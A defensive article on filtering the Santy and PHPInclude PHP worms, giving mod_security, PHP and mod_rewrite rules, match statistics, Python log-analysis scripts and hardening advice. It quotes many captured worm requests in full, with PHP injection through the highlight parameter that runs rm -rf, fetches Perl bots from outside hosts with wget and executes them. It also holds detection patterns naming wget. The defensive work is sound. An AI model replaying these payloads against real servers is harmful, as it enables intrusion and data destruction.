Filters: Suggested filters against PHP Attacking Worms
In our previous story on the Santy worm I left some comments with possible suggestions. To date, the replies I've received say those suggestions (public and private) have helped a great deal. This article focuses on mod_security filters, but alternative filters are also introduced; some of them have not been tested, so feel free to write back here or by email so that they can be improved. What has been tested successfully are the mod_security filters and some of the mod_rewrite filters. All of them grew out of the Santy and PHPInclude worms.
The following rules are implemented today in mod_security against the worms that attack PHP scripts:
SecFilterSelective ARG_highlight %27
SecFilterSelective ARG_highlight %2527
SecFilter "visualcoders\.net/spy\.gif\?\&cmd"
SecFilter ":/"
SecFilter "'"
Not all of these were in place when the worms first went live; over the past couple of days the set evolved into what is posted above. The two ARG_highlight rules look for a URL-encoded single quote in the highlight parameter at two encoding depths (in the matches below, the %27 rule fired on requests carrying %2527 and the %2527 rule on requests carrying %252527); the visualcoders rule matches one specific payload URL; ":/" matches any URL embedded in the request, which is how the worm names the file it wants fetched; and the bare quote rule catches a literal quote in the request. Here are some statistics from 25 Dec 2004, 15:11 GMT-5, to the writing of this article.
A total of 296,293 attacks were received by our servers in a 55 hour period. The breakdown follows (the numbers will not add up to 100% because filters were added over time to catch everything).
SecFilterSelective ARG_highlight %27
Matched 507 times. HTTP GET examples:
GET /modules.php?name=Forums&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;rm%20-rf%20*;wget%20http://fff.gratishost.com/sess_0bc3910d07edb36750a9babbd179edb3;perl%20sess_0bc3910d07edb36750a9babbd179edb3;wget%20http://fff.gratishost.com/wow.b;perl%20wow.b%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527
GET /modules.php?name=Forums&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(109)%252echr(101)%252echr(109)%252echr(98)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(97)%252echr(111)%252echr(108)%252echr(46)%252echr(99)%252echr(111)%252echr(109)%252echr(47)%252echr(110)%252echr(101)%252echr(119)%252echr(111)%252echr(107)%252echr(56)%252echr(52)%252echr(48)%252echr(56)%252echr(47)%252echr(121)%252echr(97)%252echr(121)%252echr(59)%252echr(46)%252echr(47)%252echr(121)%252echr(97)%252echr(121)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(109)%252echr(101)%252echr(109)%252echr(98)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(97)%252echr(111)%252echr(108)%252echr(46)%252echr(99)%252echr(111)%252echr(109)%252echr(47)%252echr(104)%252echr(121)%252echr(100)%252echr(114)%252echr(111)%252echr(48)%252echr(48)%252echr(48)%252echr(47)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(46)%252echr(116)%252echr(120)%252echr(116))%252e%2527
SecFilterSelective ARG_highlight %2527
Matched 2,607 times. HTTP GET example:
GET /modules.php?name=Forums&rush=echo%2520_START_%253B%2520cd%2520/tmp%3Bwget
%2520midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111%
3Bperl
%2520sess_189f0f0889555397a4de5485dd611111%3Bwget
%2520midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113%
3Bperl
%2520sess_189f0f0889555397a4de5485dd611113%3Bwget
%2520midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112%
3Bperl
%2520sess_189f0f0889555397a4de5485dd611112%3Bwget
%2520midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114%
3Bperl
%2520sess_189f0f0889555397a4de5485dd611114%3Brm%2520-rf
%2520sess_189f0f0889555397a4de5485dd611113.*%
2520sess_189f0f0889555397a4de5485dd611114.*
%2520sess_189f0f0889555397a4de5485dd611112.*%3Bcp%
2520sess_189f0f0889555397a4de5485dd611111
%2520sess_189f0f0889555397a4de5485dd611113%
2520sess_189f0f0889555397a4de5485dd611114
%2520sess_189f0f0889555397a4de5485dd611112%2520/var/tmp/%3Bcp
%2520sess_189f0f0889555397a4de5485dd611111%
2520sess_189f0f0889555397a4de5485dd611113
%2520sess_189f0f0889555397a4de5485dd611114%
2520sess_189f0f0889555397a4de5485dd611112
%2520/var/spool/mail/%3Bcp%2520sess_189f0f0889555397a4de5485dd611111
%2520sess_189f0f0889555397a4de5485dd611113%
2520sess_189f0f0889555397a4de5485dd611114
%2520sess_189f0f0889555397a4de5485dd611112%2520/var/mail/%3Bcp
%2520sess_189f0f0889555397a4de5485dd611111%
2520sess_189f0f0889555397a4de5485dd611113
%2520sess_189f0f0889555397a4de5485dd611114%
2520sess_189f0f0889555397a4de5485dd611112
%2520/usr/local/apache/proxy/%3Bcd%2520/var/tmp/%3Bperl%
2520sess_189f0f0889555397a4de5485dd611111
%3Bperl%2520sess_189f0f0889555397a4de5485dd611113%3Bperl
%2520sess_189f0f0889555397a4de5485dd611114%3Bperl%
2520sess_189f0f0889555397a4de5485dd611112%3Bcd
%2520/var/spool/mail/%3Bperl%2520sess_189f0f0889555397a4de5485dd611111%3Bperl
%2520sess_189f0f0889555397a4de5485dd611113%3Bperl%
2520sess_189f0f0889555397a4de5485dd611114
%3Bperl%2520sess_189f0f0889555397a4de5485dd611112%3Bcd%2520/var/mail/%3Bperl
%2520sess_189f0f0889555397a4de5485dd611111%3Bperl%
2520sess_189f0f0889555397a4de5485dd611113
%3Bperl%2520sess_189f0f0889555397a4de5485dd611114%3Bperl
%2520sess_189f0f0889555397a4de5485dd611112%3Bcd%2520/usr/local/apache/proxy/%
3Bperl
%2520sess_189f0f0889555397a4de5485dd611111%3Bperl%
2520sess_189f0f0889555397a4de5485dd611113
%3Bperl%2520sess_189f0f0889555397a4de5485dd611114%3Bperl
%2520sess_189f0f0889555397a4de5485dd611112%3Brm%2520-rf
%2520/tmp/sess_189f0f0889555397a4de5485dd611111*
%2520/var/tmp/sess_189f0f0889555397a4de5485dd611111*
%2520/var/spool/mail/sess_189f0f0889555397a4de5485dd611111*
%2520/var/mail/sess_189f0f0889555397a4de5485dd611111*
%2520/usr/local/apache/proxy/sess_189f0f0889555397a4de5485dd611111*%253B%
2520echo
%2520_END_&highlight=%252527.passthru(%2524HTTP_GET_VARS%255Brush%255D).%252527
SecFilter "visualcoders\.net/spy\.gif\?\&cmd"
Matched 186,829 times.
SecFilter ":/"
Matched 77,164 times. HTTP GET examples:
GET /check85161previous.html&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;rm%20-rf%20*;wget%20http://fff.gratishost.com/sess_0bc3910d07edb36750a9babbd179edb3;perl%20sess_0bc3910d07edb36750a9babbd179edb3;wget%20http://fff.gratishost.com/wow.b;perl%20wow.b%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527
GET /modules.php?name=Statistics&op=Stats//modules.php?
name=http://envidiosos.org/~pillar/.zk/php.gif?&cmd=cd%20/tmp;rm%20-rf%20*;wget%
20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%
20sess_189f0f0889555397a4de5485dd611111;wget%
20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%
20sess_189f0f0889555397a4de5485dd611113;wget%
20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%
20sess_189f0f0889555397a4de5485dd611112;wget%
20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%
20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%
20*;wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%
20sess_189f0f0889555397a4de5485dd611111;wget%
20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%
20sess_189f0f0889555397a4de5485dd611113;wget%
20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%
20sess_189f0f0889555397a4de5485dd611112;wget%
20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%
20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-
rf%20*;wget%
20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%
20sess_189f0f0889555397a4de5485dd611111;wget%
20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%
20sess_189f0f0889555397a4de5485dd611113;wget%
20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%
20sess_189f0f0889555397a4de5485dd611112;wget%
20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%
20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%
20*;wget%20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%
20sess_189f0f0889555397a4de5485dd611111;wget%
20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%
20sess_189f0f0889555397a4de5485dd611113;wget%
20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%
20sess_189f0f0889555397a4de5485dd611112;wget%
20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%
20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20*;cd%20%
20/usr/local/apache/proxy/;rm%20-rf%20*;wget%
20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%
20sess_189f0f0889555397a4de5485dd611111;wget%
20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%
20sess_189f0f0889555397a4de5485dd611113;wget%
20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%
20sess_189f0f0889555397a4de5485dd611112;wget%
20envidiosos.org/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%
20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20*
SecFilter "'"
Matched 10,553 times. HTTP GET examples:
GET /p284682-Ten_Green_Bottles.html&rush=echo%20_START_%3b%20killall%20-9%20perl%3bcd%20/tmp%3bwget%20grancassa.co.uk/images/bot%3bperl%20bot%3bwget%20grancassa.co.uk/images/ssh.a%3bperl%20ssh.a%3brm%20-rf%20ssh.*%3brm%20-rf%20bot*%3b%20echo%20_END_&highlight=%2527.passthru($HTTP_GET_VARS%5brush%5d).%2527
GET /t27570-winsock_error.html&rush=echo%20_START_%3b%20killall%20-9%20perl%3bcd%20/tmp%3bwget%20civa.org/pdf/bot%3bperl%20bot%3bwget%20civa.org/pdf/ssh.a%3bperl%20ssh.a%3brm%20-rf%20ssh.*%3brm%20-rf%20bot*%3b%20echo%20_END_&highlight=%2527.passthru($HTTP_GET_VARS%5brush%5d).%2527
GET /p284682-Ten_Green_Bottles.html&rush=echo%20_START_%3b%20cd%20/tmp%3bwget%20crowklan.mine.nu/~pillar/.zk/coll%3bperl%20coll%3bwget%20crowklan.mine.nu/~pillar/.zk/aol%3bperl%20aol%3brm%20-rf%20aol.*%3brm%20-rf%20coll*%3b%20echo%20_END_&highlight=%2527.passthru($HTTP_GET_VARS%5brush%5d).%2527
The number of unique IP addresses that sourced these attacks was 4,809. This is a minimum figure, based on a limited search for 'wget'; it does not include attacks that did not contain 'wget' in THE_REQUEST.
False positives were found with the ":/" filter. They come from the unusual inclusion of a full URL in the GET path, i.e.:
GET /http://castlecops.com/index.php
instead of the correct:
GET /index.php
The web server's natural response in this case is a "page not found" error, but with the filter in place mod_security returned a 406 instead.
Out of 77,164 matches only 338 were found to be false positives of this kind.
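As an added example (not code from the original article), here is a small Python script that applies the five rules above to constructed Apache combined-log lines, counts matches per rule and unique source IPs the way the figures above were produced, and picks out the ":/" false-positive case just described. It assumes mod_security 1.x URL-decodes the request once before matching (so a raw %2527 is seen by the rules as %27), which is an assumption about its normalisation step. The log lines, IP addresses, timestamps and the visualcoders request are made up for the example; the hosts and parameter names are the ones quoted earlier.

```python
import re
from collections import Counter
from urllib.parse import unquote, unquote_plus

# Constructed Apache combined-log lines shaped like the requests quoted in the
# article. IPs, timestamps and the visualcoders line are made up; the hosts
# and parameter names are the ones seen in the excerpts.
SAMPLE_LOG = """
10.0.0.1 - - [25/Dec/2004:15:11:02 -0500] "GET /modules.php?name=Forums&highlight=%2527.passthru(%2524HTTP_GET_VARS%255Brush%255D).%2527&rush=cd%20/tmp;wget%20http://fff.gratishost.com/wow.b;perl%20wow.b HTTP/1.1" 406 234 "-" "LWP::Simple/5.803"
10.0.0.2 - - [25/Dec/2004:15:11:05 -0500] "GET /modules.php?name=Statistics&op=Stats//modules.php?name=http://envidiosos.org/~pillar/.zk/php.gif?&cmd=cd%20/tmp HTTP/1.1" 406 234 "-" "libwww-perl/5.803"
10.0.0.3 - - [25/Dec/2004:15:12:40 -0500] "GET /http://castlecops.com/index.php HTTP/1.1" 406 234 "-" "Mozilla/5.0"
10.0.0.4 - - [25/Dec/2004:15:13:01 -0500] "GET /modules.php?name=Forums&highlight=o'neil HTTP/1.1" 406 234 "-" "Mozilla/5.0"
10.0.0.1 - - [25/Dec/2004:15:14:09 -0500] "GET /modules.php?name=Forums&highlight=%252527.passthru(%252524HTTP_GET_VARS%25255Brush%25255D).%252527 HTTP/1.1" 406 234 "-" "LWP::Simple/5.803"
10.0.0.6 - - [25/Dec/2004:15:14:30 -0500] "GET /modules.php?name=http://visualcoders.net/spy.gif?&cmd=cd%20/tmp HTTP/1.1" 406 234 "-" "libwww-perl/5.803"
10.0.0.5 - - [25/Dec/2004:15:15:00 -0500] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# The article's five rules. SecFilter rules apply to the whole decoded request;
# SecFilterSelective ARG_x rules apply only to that argument.
FILTERS = [
    ("ARG_highlight %27", "highlight", re.compile(r"%27")),
    ("ARG_highlight %2527", "highlight", re.compile(r"%2527")),
    ("visualcoders.net/spy.gif?&cmd", None, re.compile(r"visualcoders\.net/spy\.gif\?&cmd")),
    (":/", None, re.compile(r":/")),
    ("'", None, re.compile(r"'")),
]


def split_query(query):
    """Split on '&' and percent-decode once, as PHP does for $_GET. Done by hand
    because parse_qsl in older Python versions also splits on ';', which the
    worm's command strings are full of."""
    pairs = {}
    for part in query.split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs[unquote_plus(name)] = unquote_plus(value)
    return pairs


def parse_line(line):
    """Parse one combined-log line into a dict, or None if it does not match."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"], _, query = rec["target"].partition("?")
    rec["args"] = split_query(query)
    return rec


def matching_filters(rec):
    """Names of the rules that fire for one record. Assumption: mod_security
    1.x URL-decodes the request once before matching."""
    decoded_request = unquote(rec["target"])
    hits = []
    for name, arg, pattern in FILTERS:
        subject = decoded_request if arg is None else rec["args"].get(arg, "")
        if pattern.search(subject):
            hits.append(name)
    return hits


def colon_slash_false_positive(rec, hits):
    """The false positive described in the article: only ':/' fired, and only
    because the client put an absolute URL in the path."""
    return hits == [":/"] and rec["path"].lower().startswith(("/http://", "/https://"))


def summarize(log_text):
    """Per-rule match counts, unique attacking IPs and ':/' false positives."""
    per_filter, ips, false_positives = Counter(), set(), []
    for line in log_text.strip().splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = matching_filters(rec)
        if not hits:
            continue
        per_filter.update(hits)
        ips.add(rec["ip"])
        if colon_slash_false_positive(rec, hits):
            false_positives.append("%s %s %s" % (rec["ip"], rec["method"], rec["target"]))
    return {"per_filter": per_filter, "unique_ips": ips, "false_positives": false_positives}


if __name__ == "__main__":
    result = summarize(SAMPLE_LOG)
    for name, count in result["per_filter"].most_common():
        print("%-32s matched %d time(s)" % (name, count))
    print("unique attacking IPs:", len(result["unique_ips"]))
    print("':/' false positives:", result["false_positives"])
```

Run as is, the script reports ":/" firing four times (three real payloads plus the absolute-URL request), each ARG_highlight rule once (the %27 rule on the %2527 request, the %2527 rule on the %252527 one), and a single ":/" false positive. The o'neil line shows that the bare quote rule will also stop legitimate apostrophes, so watch its matches as well.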
Some alternative filters for those not using mod_security.
PHP: This one includes a basic set of filters that checks for more than just the current worm threat; it also addresses other well-known issues and (just to be safe) XSS:
<?php
// Reject the request if any GET value carries a tag we never expect in a
// legitimate parameter, or a quote character (the worm payload starts by
// closing a string with a quote). The quote checks will also stop legitimate
// values such as o'neil, so monitor before deploying. eregi() and
// $HTTP_GET_VARS are gone from current PHP, hence preg_match() and $_GET.
$patterns = array(
    '/<[^>]*script[^>]*>/i',
    '/<[^>]*iframe[^>]*>/i',
    '/<[^>]*object[^>]*>/i',
    '/<[^>]*applet[^>]*>/i',
    '/<[^>]*meta[^>]*>/i',
    '/<[^>]*style[^>]*>/i',
    '/<[^>]*form[^>]*>/i',
    '/<[^>]*img[^>]*>/i',
    '/<[^>]*cookie[^>]*>/i',
    '/"/',
    "/'/",
);
foreach ($_GET as $secvalue) {
    // Parameters such as a[]=x arrive as arrays; flatten so nothing is skipped.
    foreach ((array) $secvalue as $value) {
        foreach ($patterns as $pattern) {
            if (preg_match($pattern, $value)) {
                header('HTTP/1.0 403 Forbidden');
                die('<a href="http://castlecops.com">CastleCops</a> doesn\'t like you... Play somewhere else!');
            }
        }
    }
}
Parts have been tested and parts have not, so, as with all the suggestions above, proceed with caution and monitor.
mod_rewrite:
.htaccess or httpd.conf
#TEMP BANS
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} LWP::Simple [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lwp-trivial [NC,OR]
RewriteCond %{HTTP_USER_AGENT} libwww-perl [NC]
RewriteRule ^.*$ http://127.0.0.1 [R,L]
The above filters on User-Agent strings, which an attacker can change at will. The last RewriteRule redirects the requesting IP address (the attacker) to itself, which helps reduce the amount of garbage sent over the wire; if you prefer to refuse the request outright, the [F] flag in place of [R,L] returns a 403 directly without relying on the client following a redirect. I personally don't recommend this approach; I believe filters should work off the actual HTTP GET and POST requests instead.
LWP::Simple was found 276,487 times. With such a high figure I won't bother checking the other two, so if you want a quick fix, matching on that alone does the trick.
On the topic of filtering on "echr" or "esystem", which I've seen suggested on the net in forms such as:
(.*)echr(.*)
(.*)esystem(.*)
The logic is flawed. Here is the explanation. In the requests these strings are preceded by a double-encoded dot:
%252echr(x), where 'x' is any character. After the web server decodes it once this is %2echr(x), and after the script decodes it again it is .chr(x): the dot is PHP's concatenation operator and chr is a PHP function call (http://php.net/chr).
So filtering on 'echr' or 'esystem' is not valid: the 'e' is the last hex digit of %2e, not part of the function name, and the dot can simply be encoded differently (%252E, or left unencoded), after which the 'echr' filter would never match.
Filtering on 'chr' doesn't work either, because it produces false-positive matches on ordinary words:
chris
christmas
christ
...
Any of these can appear in a legitimate HTTP request. My recommendation is therefore to stay away from this kind of filtering unless you are heavily paranoid and don't mind the potential for a lot of false positives.
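To make the decoding concrete, here is an added Python example (not code from the article). It takes query strings trimmed from the excerpts above, removes the encoding layer the web server strips, keeps decoding until the value is stable (counting the extra layers the worm stacked on, which is what the %27 and %2527 ARG_highlight rules distinguish), folds chr(99).chr(100)... runs back into the string they build, and then compares a substring filter on the raw request ('echr', 'esystem', 'chr', 'wget') with a check on the decoded value for a closing quote followed by a PHP command-execution call. The samples are constructed from the excerpts (the sess_ download hashes are dropped); the list of PHP functions beyond system and passthru is my generalisation.

```python
import re
from urllib.parse import unquote, unquote_plus

# Constructed samples, trimmed from the request excerpts quoted in the article
# (sess_ download lines dropped to keep them short; hosts, parameter names and
# encodings are the ones the worm used).
SAMPLE_PASSTHRU = (
    "name=Forums"
    "&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;"
    "wget%20http://fff.gratishost.com/wow.b;perl%20wow.b%3B%20%65%63%68%6F%20%5F%45%4E%44%5F"
    "&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527"
)
SAMPLE_CHR = (
    "name=Forums&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)"
    "%252echr(47)%252echr(116)%252echr(109)%252echr(112))%252e%2527"
)
# Same payload with the encoded dot in upper case: decodes identically, but a
# substring filter no longer sees 'echr' or 'esystem'.
SAMPLE_CHR_UPPER = SAMPLE_CHR.replace("%252e", "%252E")

CHR_RUN = re.compile(r"chr\(\d+\)(?:\s*\.\s*chr\(\d+\))*")
CHR_ONE = re.compile(r"chr\((\d+)\)")
# Functions that hand a string to the shell or the PHP interpreter. The
# excerpts use system() and passthru(); the others are my generalisation.
PHP_EXEC_CALL = re.compile(r"'\s*\.\s*(?:system|passthru|exec|shell_exec|popen|eval)\s*\(")


def split_query(query):
    """Split on '&' and percent-decode once, as PHP does for $_GET. Done by hand
    because parse_qsl in older Python versions also splits on ';'."""
    pairs = {}
    for part in query.split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs[unquote_plus(name)] = unquote_plus(value)
    return pairs


def peel(value, max_rounds=5):
    """Keep percent-decoding until nothing changes. Returns (value, rounds):
    rounds is the number of encoding layers beyond the one the web server
    removes (1 for a raw %2527, 2 for a raw %252527)."""
    rounds = 0
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def fold_chr(php):
    """Replace chr(99).chr(100)... runs with the string literal they build."""
    def literal(m):
        return "'" + "".join(chr(int(n)) for n in CHR_ONE.findall(m.group(0))) + "'"
    return CHR_RUN.sub(literal, php)


def decode_query(query):
    """name -> (fully decoded value with chr() folded, extra encoding layers)."""
    result = {}
    for name, once in split_query(query).items():
        value, layers = peel(once)
        result[name] = (fold_chr(value), layers)
    return result


def shell_commands(rush):
    """Split a decoded rush= value into the individual shell commands."""
    return [c.strip() for c in rush.split(";") if c.strip()]


def has_php_injection(decoded_value):
    """True when the decoded value closes a string with a quote and then calls
    a command-execution function, the shape of every payload in the article."""
    return PHP_EXEC_CALL.search(decoded_value) is not None


def naive_hits(raw_query):
    """The substring filters discussed above, applied to the raw request."""
    return sorted(word for word in ("echr", "esystem", "chr", "wget") if word in raw_query)


if __name__ == "__main__":
    for label, query in (("passthru", SAMPLE_PASSTHRU), ("chr()", SAMPLE_CHR), ("chr() upper", SAMPLE_CHR_UPPER)):
        decoded = decode_query(query)
        print(label, "naive substring hits:", naive_hits(query))
        for name, (value, layers) in decoded.items():
            print("  %s (+%d layers): %s  injection=%s" % (name, layers, value, has_php_injection(value)))
        if "rush" in decoded:
            print("  commands:", shell_commands(decoded["rush"][0]))
```

Run against the article's full chr() example, the highlight value decodes to 'cd /tmp;wget members.aol.com/newok8408/yay;./yay;wget members.aol.com/hydro000/worm.txt;perl worm.txt'. Upper-casing the encoded dot (%252E) defeats the 'echr' and 'esystem' substring filters while the decoded result, and the check on it, are unchanged; 'christmas' trips the bare 'chr' filter and nothing else.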
Another filter I've seen is on "wget". Using that alone against THE_REQUEST can produce lots of false positives: fine if you are really paranoid, otherwise a nuisance because it will (potentially) drop valid requests. Not to mention that many attacks do not use "wget" at all.
Some hardening suggestions. You can mount the following directories with 'noexec' to stop direct execution of files placed in them:
/tmp
/usr/tmp
/var/tmp
Note that noexec only blocks executing a file directly; the payloads above run 'perl sess_...', where perl is the executable and the dropped file is merely read, so noexec does not stop that step. Another notion is restricting access permissions on tools such as 'wget'. Strip group and world access, i.e. 'chmod 700 wget', so that only root can run it. (Avoid 'chmod 400': with no execute bit set at all, not even root can run the binary.) Going a step further, apply the same permissions to '/usr/bin/*cc*' so that only root can run compilers such as 'gcc'. The same reasoning applies to any other fetch tool installed (curl, lynx, fetch), and perl itself can fetch over HTTP, which is how the worm spreads in the first place, so this is not a complete answer. Such hardening can help stave off local and remote attacks, but don't consider it 100% foolproof either. Think of this as just another layer of security.
More suggestions can be made available, but I feel this is a good starting point. If you run into any problems, feel free to reply back here.
With the mod_security filters in place, none of the attacks on our server have gone unmatched.